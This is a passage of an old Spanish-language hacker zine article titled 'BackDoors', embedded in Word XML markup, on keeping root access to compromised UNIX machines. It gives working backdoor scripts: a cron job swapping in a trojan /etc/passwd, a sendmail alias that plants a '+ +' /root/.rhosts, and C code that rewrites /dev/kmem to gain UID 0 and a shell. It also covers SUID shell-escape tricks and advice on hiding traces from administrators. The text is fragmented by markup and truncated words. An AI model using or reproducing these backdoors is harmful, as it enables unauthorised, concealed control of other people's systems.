        <w:t>29      4       *       *       *       /bin/usr/.hiden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Pa el siguiente cron, crea un fichero de password personal /var/spool/mail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llamado .sneaky (o como sea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Pon en este porgrama en /bin/usr (o donde kieras :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.hidden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-------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&lt;++&gt; set_017/backdoors/.hidden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#!/bin/sh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# Install trojan /etc/passwd file for one minute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#daemon9@netcom.com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cp /etc/passwd /etc/.temppass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cp /var/spool/mail/.sneaky /etc/passwd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sleep 60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mv /etc/.temppass /etc/passwd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&lt;--&gt;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7- Sendmail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Edita el fichero /etc/aliases a~ade esta line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decode: |/usr/bin/uudecod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asegurate de ocultarla bien en el fichero.  El fichero uudecode es un script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:)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Aki tienes el script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uudecode.sh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-----------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&lt;++&gt; set_017/backdoors/uudecode.sh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#!/bin/sh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# Create our .rhosts file.  Note this will output to stdout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echo "+ +" &gt; tmpfile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/usr/bin/uuencode tmpfile /root/.rhosts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&lt;--&gt;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Ok, Manda mail a decode, en el subjet metes la version uuencodeada del .rhosts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echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@victimserver.com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es-ES_tradnl"/>
        </w:rPr>
        <w:t>Puedes a~adir cualkier programa de los listados de antes (los diferentes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CRONs) para ke sean ejecutados por el alias. Se imaginativ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s-ES_tradnl"/>
        </w:rPr>
        <w:t>*NOTA: Esta backdoor a mi no me funciona en mi linux. No la he probado en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ningun otro siti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ab/>
        <w:t xml:space="preserve"> Yo la pongo por si acaso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8- Esta es experimental, al parecer en algunos sistemas (sobre todo linux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cuando alguien tiene un uid/gid erroneo en el /etc/passwd, el login le pone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uid/gid 0, osea root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Ejemplo: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>rmartin:x:x50:50:R. Martin:/home/rmatin:/bin/bash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9- /dev/kmem. Te imaginas poder acceder a memoria para cambiar tu UID?? , por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bien sencillo ke es..., lo unico ke tienes ke hacer es, como root, dejar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/dev/kmem para ke se pueda leer y escribir siendo kien kiera ke seas,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(aparte de cambiar el UID eso sirve para muuuuuuuchas mas cosas). Bien, el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resto lo hace este program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&lt;++&gt; set_017/backdoors/kmemrd.c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/* If /kmem is is readable and writable, this program will change the user's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UID and GID to 0.  */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/* This code originally appeared in "UNIX security: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 practical tutorial" with some modifications by daemon9@netcom.com */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#include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#include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#include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#include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#include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#include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#include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#define KEYWORD "nomenclature1"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truct user userpage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ong address(), userlocation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nt main(argc, argv, envp)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nt argc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char *argv[], *envp[];{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int count, fd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long where, lseek()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if(argv[1]){         /* we've got an argument, is it the keyword? */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if(!(strcmp(KEYWORD,argv[1]))){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fd=(open("/dev/kmem",O_RDWR)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if(fd&lt;0){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        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printf("Cannot read or write to /dev/kmem\n")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        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perror(argv)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        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exit(10)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}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userlocation=address()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where=(lseek(fd,userlocation,0)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if(where!=userlocation){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        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printf("Cannot seek to user page\n")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        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perror(argv)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        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exit(20)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}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count=read(fd,&amp;userpage,sizeof(struct user))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if(count!=sizeof(struct user)){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        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printf("Cannot read user page\n")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        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perror(argv)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        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exit(30)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}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 xml:space="preserve">          printf("Current UID: %d\n",userpage.u_ruid)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printf("Current GID: %d\n",userpage.g_ruid)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userpage.u_ruid=0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userpage.u_rgid=0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where=lseek(fd,userlocation,0)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if(where!=userlocation){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        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printf("Cannot seek to user page\n")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        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perror(argv)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        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exit(40)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}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write(fd,&amp;userpage,((char *)&amp;(userpage.u_procp))-((char *)&amp;userpage))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 xml:space="preserve">          execle("/bin/csh","/bin/csh","-i",(char *)0, envp)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}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}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} /* End main */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#include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#include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#include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#define LNULL ((LDFILE *)0)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ong address(){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LDFILE *object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SYMENT symbol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long idx=0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object=ldopen("/unix",LNULL)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if(!object){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fprintf(stderr,"Cannot open /unix.\n")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exit(50)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}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for(;ldtbread(object,idx,&amp;symbol)==SUCCESS;idx++){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if(!strcmp("_u",ldgetname(object,&amp;symbol))){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fprintf(stdout,"User page is at 0x%8.8x\n",symbol.n_value)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ldclose(object)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return(symbol.n_value)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}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}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fprintf(stderr,"Cannot read symbol table in /unix.\n");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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="es-ES_tradnl"/>
        </w:rPr>
        <w:t>exit(60);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}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&lt;--&gt;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Mejoras:   Para ke la no cante musso esto, es mejor dejar un SUID script k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lo ke haga sea dejar /dev/kmem con permisos 666 durante un corto espacio d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tiempo en el cual, ejecutas el programa, claro esta ke el  SUID script casi,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casi canta mas ke dejar /dev/kmem escribible y leible todo el tiempo, tu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decides, el script ser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chmod 666 /dev/kmem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leep 300               # Nap for 5 minutes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chmod 600 /dev/kmem     # Or whatever it was before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Recuerda darle los permisos 4111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10- Escapes de shell, bueno, esta otra backdoor a pesar de lo ke parece,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funciona de puta madre y nadie se da cuenta de ella, a no ser ke sea un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hacker de los buenos ke se lo kurra cuando kiere hacerse root, sirve, para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mentener el root (no el acceso), consiste en poner SUID a programas con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escape a shell, como por ejemplo el 'Mail', asi podras ejecutar el programa y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salir a shell y saldras como root, por supuesto, culakiera puede hacerse root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asi, pero nadie se molesta en comprobar si es root cada vez ke lee un mail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Osea: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#chmod 4755 /bin/Mail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$ mail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you have new mail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Bla,bla,bla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Bla,bla,bla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&amp;!/bin/sh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#whoami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root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11-Otras: Hay por ahi muuuuuchos troyanos de programas como su,login (recordad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set 11),passwd,chfn, chsh, etc .... los cuales son tambien backdoors, d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hecho son las mejores, pero a mi me dan muchos quebraderos de kabeza (no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compilan, no encuentras para ese sistema operativo, ....), las backdoors k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he puesto, funcionan en todos los UNIX, o al menos en casi todos, si en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alguno no funciona, seguro ke solo le tienes ke hacer una peke~a variacion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a la backdoor pa ke funsione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Manteniendo la backdoor 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es-ES_tradnl"/>
        </w:rPr>
        <w:t>El mejor consejo ... Oculta tus rastros, si un admin no se da cuenta de k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ha sido hackeado, no buscara backdoor alguna, aparte debes de esconder bien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las backdoors. Ten en cuenta una cosa, si el admin descubre ke ha sido hackeado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y es un poco listo, lo mas seguro es ke encuentre tus backdoors (por checksums,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fechas, programas SUID...) asieske, lo primero es poner la backdoor y lo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segundo ocultar tu rastr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Fuego Fatuo (La KaTeDral)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Para cualkier consulta, mandarme algun programa o sugerencia: fatuo@usa.net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Para insultos, protestas o amenazas de muerte: root@cpd.um.es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ftdownload.com.a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2T19:21:00Z</dcterms:created>
  <dc:creator>softdownload</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>softdownload</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2001-08-12T19:23:00Z</dcterms:modified>
  <cp:revision>1</cp:revision>
  <dc:subject/>
  <dc:title>BackDoors</dc:title>
</cp:coreProperties>
</file>